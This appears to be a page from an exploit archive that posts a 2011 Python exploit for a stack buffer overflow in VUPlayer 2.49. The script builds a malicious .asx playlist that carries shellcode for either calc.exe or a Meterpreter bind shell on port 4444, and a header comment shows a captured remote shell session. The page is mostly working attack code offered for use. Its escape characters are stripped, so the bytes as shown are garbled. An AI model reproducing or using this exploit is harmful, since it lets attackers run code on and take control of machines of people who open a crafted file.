Home / exploitsPDF  

VUPlayer 2.49 Stack Buffer Overflow

Posted on 02 July 2011

#[*] Started bind handler
#[*] Starting the payload handler...
#[*] Sending stage (749056 bytes) to 192.168.164.147
#[*] Meterpreter session 2 opened (192.168.164.141:53820 -> 192.168.164.147:4444) at 2011-07-02 04:08:05 +0530
#
#meterpreter > shell
#Process 2664 created.
#Channel 1 created.
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:Documents and SettingsAdministratorDesktop>
#

from struct import pack
import os
import sys
en = '''\n
|| VUPlayer v2.49 Stack BufferOverflow Exploit (calc/bind) ||
Author : Zer0 Thunder

------------------------------------------------------------

Select the shellcode you want

1. Calculator
2. Meterpreter BIND Shell

Enter the Selected Shellcode Number
'''
print en
shell = input(":")
dimbo		= "crash.asx"
header1		= "x3cx61x73x78x20x76x65x72x73x69x6fx6ex20x3dx20x22x33x2ex30x22x20x3e
"
header2n6	= "x3cx65x6ex74x72x79x3e
"
header3		= "x3cx74x69x74x6cx65x3ex65x78x70x6cx6fx69x74x2ex6dx70x33x3cx2fx74x69x74x6cx65x3e
"
header4		= "x3cx72x65x66x20x68x72x65x66x20x3d"
header5		= "x22x20x2fx3ex3cx65x6ex74x72x79x3e"
header7		= "
x3cx2fx61x73x78x3e"
junk		= "x41" * 1012
junk2		= pack('<L',0x1010539F) #JMP ESP BASSWMA.dll
nops 		= "x90" * 20
#Calc.exe

calc= ("xdaxc1xd9x74x24xf4x5ax4ax4ax4ax4ax43x43x43x43"
"x43x43x43x52x59x56x54x58x33x30x56x58x34x41x50"
"x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54"
"x41x41x51x32x41x42x32x42x42x30x42x42x58x50x38"
"x41x43x4ax4ax49x4bx4cx5ax48x4dx59x43x30x43x30"
"x43x30x43x50x4bx39x4bx55x56x51x58x52x52x44x4c"
"x4bx50x52x56x50x4cx4bx56x32x54x4cx4cx4bx56x32"
"x45x44x4cx4bx52x52x47x58x54x4fx4ex57x50x4ax56"
"x46x50x31x4bx4fx50x31x49x50x4ex4cx47x4cx45x31"
"x43x4cx54x42x56x4cx47x50x4fx31x58x4fx54x4dx43"
"x31x4fx37x4dx32x5ax50x56x32x51x47x4cx4bx56x32"
"x54x50x4cx4bx51x52x47x4cx43x31x4ex30x4cx4bx47"
"x30x54x38x4dx55x49x50x43x44x51x5ax45x51x4ex30"
"x56x30x4cx4bx51x58x54x58x4cx4bx56x38x47x50x43"
"x31x58x53x5ax43x47x4cx47x39x4cx4bx47x44x4cx4b"
"x43x31x58x56x50x31x4bx4fx50x31x49x50x4ex4cx49"
"x51x58x4fx54x4dx45x51x58x47x47x48x4dx30x52x55"
"x4bx44x45x53x43x4dx5ax58x47x4bx43x4dx47x54x52"
"x55x5ax42x50x58x4cx4bx51x48x51x34x43x31x49x43"
"x52x46x4cx4bx54x4cx50x4bx4cx4bx51x48x45x4cx45"
"x51x58x53x4cx4bx45x54x4cx4bx43x31x58x50x4dx59"
"x47x34x51x34x47x54x51x4bx51x4bx45x31x51x49x51"
"x4ax56x31x4bx4fx4dx30x50x58x51x4fx51x4ax4cx4b"
"x45x42x5ax4bx4cx46x51x4dx52x4ax43x31x4cx4dx4d"
"x55x4ex59x43x30x45x50x45x50x56x30x52x48x56x51"
"x4cx4bx52x4fx4cx47x4bx4fx49x45x4fx4bx5ax50x4f"
"x45x49x32x50x56x45x38x4fx56x5ax35x4fx4dx4dx4d"
"x4bx4fx4ex35x47x4cx45x56x43x4cx45x5ax4dx50x4b"
"x4bx4dx30x52x55x45x55x4fx4bx51x57x52x33x52x52"
"x52x4fx52x4ax43x30x56x33x4bx4fx4ex35x45x33x45"
"x31x52x4cx52x43x56x4ex45x35x54x38x43x55x43x30"
"x41x41")
#meterpreter/bind_tcp LPORT=4444

bind = ("x89xe2xdaxcdxd9x72xf4x5bx53x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx5ax48x4cx49x43x30"
"x43x30x43x30x43x50x4bx39x4bx55x50x31x58x52x43"
"x54x4cx4bx56x32x50x30x4cx4bx51x42x54x4cx4cx4b"
"x51x42x45x44x4cx4bx43x42x56x48x54x4fx58x37x51"
"x5ax47x56x50x31x4bx4fx50x31x4fx30x4ex4cx47x4c"
"x43x51x43x4cx54x42x56x4cx51x30x49x51x58x4fx54"
"x4dx45x51x58x47x4bx52x4cx30x51x42x56x37x4cx4b"
"x51x42x52x30x4cx4bx47x32x47x4cx43x31x58x50x4c"
"x4bx51x50x54x38x4cx45x4fx30x52x54x51x5ax43x31"
"x4ex30x56x30x4cx4bx51x58x52x38x4cx4bx56x38x47"
"x50x43x31x58x53x4bx53x47x4cx51x59x4cx4bx56x54"
"x4cx4bx43x31x49x46x56x51x4bx4fx50x31x4fx30x4e"
"x4cx4fx31x58x4fx54x4dx45x51x4fx37x56x58x4bx50"
"x54x35x4bx44x45x53x43x4dx4bx48x47x4bx43x4dx47"
"x54x43x45x5ax42x50x58x4cx4bx50x58x56x44x45x51"
"x58x53x43x56x4cx4bx54x4cx50x4bx4cx4bx56x38x45"
"x4cx43x31x58x53x4cx4bx43x34x4cx4bx43x31x58x50"
"x4cx49x47x34x51x34x51x34x51x4bx51x4bx43x51x50"
"x59x50x5ax50x51x4bx4fx4dx30x56x38x51x4fx51x4a"
"x4cx4bx52x32x5ax4bx4cx46x51x4dx43x58x56x53x47"
"x42x45x50x45x50x45x38x52x57x43x43x50x32x51x4f"
"x56x34x45x38x50x4cx52x57x47x56x43x37x4bx4fx49"
"x45x4fx48x4cx50x45x51x43x30x45x50x56x49x58x44"
"x50x54x50x50x52x48x51x39x4bx30x52x4bx43x30x4b"
"x4fx58x55x50x50x50x50x50x50x56x30x51x50x50x50"
"x51x50x56x30x52x48x4bx5ax54x4fx49x4fx4bx50x4b"
"x4fx58x55x4cx57x50x31x49x4bx56x33x43x58x43x32"
"x45x50x54x51x51x4cx4cx49x4dx36x43x5ax52x30x50"
"x56x50x57x52x48x49x52x49x4bx50x37x43x57x4bx4f"
"x58x55x56x33x51x47x43x58x58x37x4dx39x56x58x4b"
"x4fx4bx4fx49x45x50x53x56x33x50x57x45x38x43x44"
"x5ax4cx47x4bx4bx51x4bx4fx49x45x51x47x4cx57x45"
"x38x54x35x52x4ex50x4dx45x31x4bx4fx49x45x52x4a"
"x43x30x43x5ax54x44x51x46x51x47x52x48x45x52x4e"
"x39x4fx38x51x4fx4bx4fx58x55x4cx4bx50x36x52x4a"
"x51x50x52x48x43x30x54x50x43x30x45x50x56x36x43"
"x5ax45x50x43x58x56x38x4fx54x51x43x4bx55x4bx4f"
"x58x55x4cx53x50x53x43x5ax43x30x56x36x50x53x51"
"x47x52x48x43x32x4ex39x58x48x51x4fx4bx4fx49x45"
"x43x31x49x53x51x39x4fx36x4dx55x4bx46x54x35x5a"
"x4cx4fx33x41x41")

if shell == 1:
print "You Have Selected Calculator
"
junk3 	= "x43" * (2000-len(header1+header2n6+header3+header4+junk+junk2+nops+calc+header5+header7))
payload 	= header1+header2n6+header3+header4+junk+junk2+nops+calc+junk3+header5+header7
elif shell == 2:
print "You Have Selected BIND Shell
"
junk3 	= "x43" * (2000-len(header1+header2n6+header3+header4+junk+junk2+nops+bind+header5+header7))
payload 	= header1+header2n6+header3+header4+junk+junk2+nops+bind+junk3+header5+header7
else:
print "Wrong input"


print "Have Fun !!! "
file = open(dimbo , 'w')
file.write(payload)
file.close()

#E-mail - neonwarlock@live.com
#Site/Blog - http://blog.zt-security.com/
# Sri Lankan Hackers

 

TOP

Malware :

Exploits :